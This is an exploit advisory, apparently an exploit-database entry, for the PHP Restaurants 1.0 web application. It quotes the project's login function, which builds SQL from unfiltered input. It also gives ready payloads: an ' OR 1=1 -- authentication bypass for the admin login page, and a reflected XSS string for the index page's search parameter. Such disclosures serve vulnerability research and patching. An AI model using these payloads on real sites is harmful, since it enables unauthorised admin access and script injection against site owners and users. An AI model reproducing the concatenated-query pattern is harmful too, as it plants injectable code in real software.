扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS) # Google Dork: None # Date: 4/26/2023 # Exploit Author: Or4nG.M4n # Vendor Homepage: https://github.com/jcwebhole # Software Link: https://github.com/jcwebhole/php_restaurants # Version: 1.0 functions.php function login(){ global $conn; $email = $_POST['email']; $pw = $_POST['password']; $sql = "SELECT * FROM <code>users</code> WHERE <code>email</code> = '".$email."' AND <code>password</code> = '".md5($pw)."'"; <-- there is No filter to secure sql query parm[email][password] $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day header('location: index.php'); } } else { header('location: login.php?m=Wrong Password'); } } login bypass at admin page /rest1/admin/login.php email & password : ' OR 1=1 -- <- add [space] end of the payload cross site scripting main page /index.php xhttp.open("GET", "functions.php?f=getRestaurants<?php if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we can insert our xss payload ?> ", true); xhttp.send(); </script> <-- when you insert your'e payload don't forget to add </script> like xss payload : </script><img onerror=alert(1) src=a> |
体验盒子
